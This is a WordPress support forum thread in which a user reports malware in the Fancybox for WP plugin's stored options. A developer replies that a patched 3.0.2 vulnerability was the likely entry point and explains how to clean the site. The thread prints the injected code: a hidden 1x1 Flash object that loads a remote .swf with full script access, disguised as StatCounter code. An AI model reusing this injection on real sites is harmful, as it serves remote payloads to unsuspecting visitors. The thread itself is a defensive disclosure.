Malware?

upon further investigation I’ve found that the suspicious code is in the options. The mfbfw option contains the malware code and injects into the Fancybox for WP header output. Anyone have any ideas how this compromise could have happened? Here is what was in the mfbfw option:

a:3:{s:10:”extraCalls”;s:1:” “;s:13:”transitionOut”;s:762:””,’centerOnScroll’: false});})
</script>
<!– Start of StatCounter Code for Default Guide –>
<object type=”application/x-shockwave-flash” data=”https://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1px” height=”1px” id=”cea0d16fdd2e07f5498e0c64ebd186a2″>
<param name=”AllowScriptAccess” value=”always”/>
<param name=”myid” value=”cea0d16fdd2e07f5498e0c64ebd186a2″ />
<param name=”movie” value=”https://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2″/>
<embed src=”https://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1″ height=”1″>
</embed>
</object>
<!– End of StatCounter Code for Default Guide –>
<script>({“;s:16:”extraCallsEnable”;s:3:”off”;}

Hi acurran,

Sorry for the inconvinience.

There was a vulnerability in version 3.0.2 that was exploited for a brief period of time and patched as soon as it became know in February (more info). It’s likely the breach occurred back then, and the malware code remained in the database since then, or it might have occurred recently if the plugin was not up to date.

Make sure to remove the malware if you haven’t already (if unsure, you can use the reset settings button to clean it), and check all instances of the plugin on other WordPress installations are clean and up to date.

Thanks for the response Jose